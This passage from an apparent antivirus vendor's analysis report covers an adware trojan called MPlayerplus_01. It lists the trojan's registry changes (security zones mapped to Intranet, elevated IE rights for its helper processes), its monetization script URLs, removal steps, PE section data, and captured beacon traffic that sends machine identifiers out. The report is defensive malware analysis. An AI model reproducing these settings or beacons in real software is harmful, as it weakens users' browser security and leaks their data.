"Params" = "{ source_id : 001359, sub_id : 0, uzid : 0"
[HKCU\Software\MPlayerplus_01\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\MPlayerplus_01\Manifest]
"Name" = "MPlayerplus_01"
[HKCU\Software\MPlayerplus_01\Installer]
"Time" = "1413862412"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Name" = "CrossriderAppUtils"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_downloads_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\220]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/icm_base_m.js"
[HKCU\Software\MPlayerplus_01\Code]
"NewTabJavaScript" = ""
[HKCU\Software\MPlayerplus_01\Plugins\46]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IETimers.js"
[HKCU\Software\MPlayerplus_01\Plugins\91]
"Name" = "monetizationLoader.js"
[HKCU\Software\MPlayerplus_01\Plugins\28]
"Name" = "initializer"
[HKCU\Software\MPlayerplus_01\Plugins\183]
"URL" = "http://js.clientstaticserv.com/plugins/mins/tabsWrapper.js"
[HKCU\Software\MPlayerplus_01\Plugins\226]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[226] = function() { if (appAPI.internal.monetization.loader && appAPI.internal.monetization.loader.setCampaignId) { appAPI.internal.monetization.loader.setCampaignId(1026); }};"
[HKCU\Software\MPlayerplus_01\Plugins\3]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie8_fix_2.js"
[HKLM\SOFTWARE\MPlayerplus_01\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"
[HKCU\Software\MPlayerplus_01\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"
[HKCU\Software\MPlayerplus_01\Plugins\221]
"Name" = "icm_downloads_m"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEAjax.js"
[HKCU\Software\MPlayerplus_01\Manifest]
"UpdateInterval" = "360"
[HKCU\Software\MPlayerplus_01\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\MPlayerplus_01\Plugins\21]
"URL" = "http://js.clientstaticserv.com/plugins/mins/debug.js"
[HKCU\Software\MPlayerplus_01\Plugins\94]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\2]
"Version" = "2"
[HKCU\Software\MPlayerplus_01\Plugins\191]
"Version" = "5"
[HKCU\Software\MPlayerplus_01\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\MPlayerplus_01\Plugins\35]
"Version" = "4"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\242]
"Name" = "price_gong_m"
[HKCU\Software\MPlayerplus_01\Plugins\244]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/engageya_inner_m.js"
[HKCU\Software\Crossrider]
"Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"
[HKCU\Software\MPlayerplus_01\Plugins\13]
"Version" = "7"
[HKCU\Software\MPlayerplus_01\Manifest]
"IsButtonEnabled" = "false"
[HKCU\Software\MPlayerplus_01\Installer]
"CodeDownloadDomain" = "http://js.clientstaticserv.com"
[HKCU\Software\MPlayerplus_01\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\MPlayerplus_01\Plugins\177]
"Name" = "crossriderDashboard"
[HKCU\Software\MPlayerplus_01\Plugins\233]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\64]
"Version" = "3"
[HKCU\Software\MPlayerplus_01\Plugins\38]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IECallbacks.js"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\MPlayerplus_01\Manifest]
"PublisherId" = "21636"
[HKCU\Software\MPlayerplus_01\Manifest]
"UninstallerOfferAction" = "NA"
[HKCU\Software\MPlayerplus_01\Plugins\104]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/monetization/geo/jollywallet_m.js"
[HKCU\Software\MPlayerplus_01\Plugins\211]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"
[HKLM\SOFTWARE\MPlayerplus_01\IE]
"TotalProfiles" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DE D2 FD 9C 6A 45 BB 67 7E 29 3F 0B A9 76 71 17"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110511421146}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil.exe"
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{981FDCE3-5912-4D50-A786-2E425268440}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110511421146}" = ""
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{BB55C102-1126-4D5D-A6A7-604BA42E4ED4}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E55C3E03-2C2F-48B8-A9DD-902CB844E}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{531B4925-FB1F-48E9-A556-5B8FD9E9C7C}]
"AppName" = "772406a5-70fe-462f-841c-e18bdccbdc78-2.exe-buttonutil64.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process 3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F A3 6C D9 D2 D5 2F 2F FD E3 12 62 D8 26 93 1B"
Dropped PE files
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
GoogleUpdate.exe:2460
GoogleUpdate.exe:756
GoogleUpdate.exe:2652
GoogleUpdate.exe:2296
GoogleUpdate.exe:1288
GoogleUpdate.exe:2364
GoogleUpdate.exe:2356
772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
Iufkopcpdfjpcg.exe:424
MPlayerplus_01-bg.exe:2776
772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
%original file name%.exe:688
regsvr32.exe:2736
dwwin.exe:3088
MPlayerplus_01-codedownloader.exe:2344
MPlayerplus_01-codedownloader.exe:2224
772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Goegljtz
Product Name: Oujmyxypscw
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 22.6.3.9
File Description: Odyqmjhkphi
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 34880 | 35328 | 4.14627 | 8b211302c668146bb8cce549607b031f |
.data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
.rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
.bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
.ndata | 319488 | 376832 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
.rsrc | 696320 | 98304 | 95232 | 5.40652 | cd8147b56e991064a2e5c04b62e8a51c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
hxxp://js.newdatastatsserv.com/plugins/mins/275.js?ver=3&rnd=41 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 | 69.16.175.42 |
hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q | |
hxxp://js.newdatastatsserv.com/plugins/mins/281.js?ver=2&rnd=41 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugin/apps/54246/plugins/na/ie/plugins.json?ver=93&rnd=9729 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugin/apps/54246/js/na/ie/app_code.js?ver=102&rnd=6758 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/263.js?ver=2&rnd=41 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/244.js?ver=5&rnd=41 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/220.js?ver=23&rnd=8467 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/246.js?ver=15&rnd=6334 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/93.js?ver=13&rnd=6334 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/269.js?ver=1&rnd=6334 | 69.16.175.42 |
hxxp://update.clientstaticserv.com/omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098 | |
hxxp://update.clientstaticserv.com/omaha/430FD4D0-B729-4F61-AA34-91526481799D/1/ping.xml?rand=3095 | |
hxxp://js.newdatastatsserv.com/plugins/mins/102.js?ver=10&rnd=6334 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/104.js?ver=12&rnd=6334 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/180.js?ver=12&rnd=6334 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/221.js?ver=4&rnd=8467 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/273.js?ver=4&rnd=41 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/233.js?ver=7&rnd=8467 | 69.16.175.42 |
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt | 212.30.134.169 |
hxxp://js.newdatastatsserv.com/plugins/mins/260.js?ver=4&rnd=41 | 69.16.175.42 |
hxxp://stats.clientstaticserv.com/stats.gif?action=daily&app=54246&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&ver=1_34_05_12&installtime=1413862412&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001359&campaign=001359&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=33&bgver=1&pluginsver=27&curtime=1413862412&lifetime=0&rnd=2940 | 176.32.100.193 |
hxxp://js.newdatastatsserv.com/plugins/mins/42.js?ver=10&rnd=41 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugin/apps/54246/bg/na/ie/bg_code.js?ver=2&rnd=3013 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/242.js?ver=4&rnd=8467 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/211.js?ver=7&rnd=8467 | 69.16.175.42 |
hxxp://crl.thawte.com/ThawteTimestampingCA.crl | 23.43.133.163 |
hxxp://logs.clientstaticserv.com/monetization.gif?rand=3098&event=7&agent_type=2&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359 | 69.16.175.10 |
hxxp://js.newdatastatsserv.com/plugins/mins/195.js?ver=28&rnd=8467 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/192.js?ver=9&rnd=8467 | 69.16.175.42 |
hxxp://js.newdatastatsserv.com/plugins/mins/286.js?ver=2&rnd=41 | 69.16.175.42 |
hxxp://stats.clientstaticserv.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 | 176.32.100.193 |
hxxp://js.clientstaticserv.com/plugin/apps/54246/manifest/1_34_05_12/ie6/manifest.xml?ver=33&rnd=4638 | 69.16.175.42 |
hxxp://logs.clientstaticserv.com/monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de | 69.16.175.10 |
hxxp://js.newdatastatsserv.com/plugins/mins/289.js?ver=1&rnd=41 | 69.16.175.42 |
hxxp://stats.clientstaticserv.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 | 176.32.100.193 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /monetization.gif?event=3&ibic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&verifier=60aa827dc6ab7283db367fb7eb2cda1a&campaign=001359&app=54246&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_33&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1413862412&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de HTTP/1.1
Host: logs.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:42 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1413862422.dop010.am4.t,1413862422.cds058.am4.c
GIF89a.............,...........D..;..
GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=10211
Date: Tue, 21 Oct 2014 03:33:49 GMT
Connection: keep-alive
X-CCC: NO
X-CID: 2
1401CFCEB3C4C42958....
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=10076
Date: Tue, 21 Oct 2014 03:33:49 GMT
Connection: keep-alive
X-CCC: NO
X-CID: 2
<<< skipped >>>
GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098&w=3:uxP7lqHPgjR31A1VCO5ingXndb1rFK_KAHySpOeS13mFOEtsynLmgcq7I6NOZRbf7J9PCORCxJAYvLQBx2b-1W8C0I5TnOv5uontBSViwgQRQhARK-F_MdynNh4BLVWmYQSh2YIjyRn92lVEe91SjRxOzYFYrMl6EX22_Crgr2Q HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp;cup
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
If-Match: "BRHtvIFHcNUSomdLAnWeH6iI1SQ"
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399811332"
Last-Modified: Sun, 11 May 2014 12:28:52 GMT
Cache-Control: max-age=21600
Content-Length: 403
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.s,1413862436.dop001.se1.r,1413862436.cds019.se1.p,1413862437.cds067.am4.p
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>.</response>.....
GET /omaha/B13CB685-2858-4509-BB2E-34E3545B73F9/1/update.xml?rand=3098 HTTP/1.1
User-Agent: Google Update/1.3.25.0;winhttp
X-Last-HR: 0x80040881
X-Last-HTTP-Status-Code: 200
X-Retry-Count: 0
Host: update.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1399811332"
Last-Modified: Sun, 11 May 2014 12:28:52 GMT
Cache-Control: max-age=21600
Content-Length: 403
Content-Type: text/xml; charset=UTF-8
X-HW: 1413862436.dop017.am4.t,1413862437.cds067.am4.c
<?xml version="1.0" encoding="UTF-8"?>.<response protocol="3.0" server="prod">. <daystart elapsed_seconds="56508"/>. <app appid="{430FD4D0-B729-4F61-AA34-91526481799D}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>. <app appid="{b13cb685-2858-4509-bb2e-34e3545b73f9}" status="ok">. <updatecheck status="noupdate"/>. <ping status="ok"/>. </app>.</response>...
GET /installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=0&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1413862412&procruntime=10&rnd=1413862422 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: iWgZhMz61hH/abToeYxoWIIfOlw 1rP1wEWRnHmzYuJ7751g9oDM0KlFWLStwYTM
x-amz-request-id: B896F103AC0DE8FA
Date: Tue, 21 Oct 2014 03:33:43 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_33&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: ANu wI9oJQ8 gzBNohUzdmuUThDrmHvL3uEQGuiVJFnmiGB1Qf6E3dMGaC2mixIL
x-amz-request-id: 00FF35758F9B059E
Date: Tue, 21 Oct 2014 03:34:03 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:39 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....
GET /apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=EAEB041DFB674B59BB4BCF5DE150DAB5IE&app=54246&appver=102&verifier=60aa827dc6ab7283db367fb7eb2cda1a&srcid=001359&version_date=16-05-14&installtime=1413862412&curtime=1413862412&lifetime=0&silent=1&procstarttime=1413862412&procruntime=30&rnd=1413862442 HTTP/1.1
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: oQ1YkHy5hkWQABIFmdoyLL4OO1kXa04na2FBbZght FjWo3f2 kzB0GF/3vcwBT
x-amz-request-id: 9EBE31A8291AC950
Date: Tue, 21 Oct 2014 03:34:03 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Feb 2014 23:56:30 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /plugins/mins/275.js?ver=3&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263879"
Last-Modified: Sun, 13 Jul 2014 15:04:39 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
GET /plugins/mins/289.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1413821196"
Last-Modified: Mon, 20 Oct 2014 16:06:36 GMT
Cache-Control: max-age=152
Content-Length: 903
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds054.am4.c
GET /plugins/mins/260.js?ver=4&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263875"
Last-Modified: Sun, 13 Jul 2014 15:04:35 GMT
Cache-Control: max-age=900
Content-Length: 823
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862436.dop013.am4.t,1413862436.cds046.am4.c
GET /plugins/mins/244.js?ver=5&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1405263865"
Last-Modified: Sun, 13 Jul 2014 15:04:25 GMT
Cache-Control: max-age=900
Content-Length: 1103
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
GET /plugins/mins/242.js?ver=4&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1403211500"
Last-Modified: Thu, 19 Jun 2014 20:58:20 GMT
Cache-Control: max-age=900
Content-Length: 1023
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
GET /plugins/mins/230.js?ver=7&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:57 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1408273144"
Last-Modified: Sun, 17 Aug 2014 10:59:04 GMT
Cache-Control: max-age=900
Content-Length: 867
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1413862437.dop013.am4.t,1413862437.cds039.am4.c
GET /plugins/mins/223.js?ver=8&rnd=8467 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.newdatastatsserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 21 Oct 2014 03:33:56 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1404137812"
Last-Modified: Mon, 30 Jun 2014 14:16:52 GMT
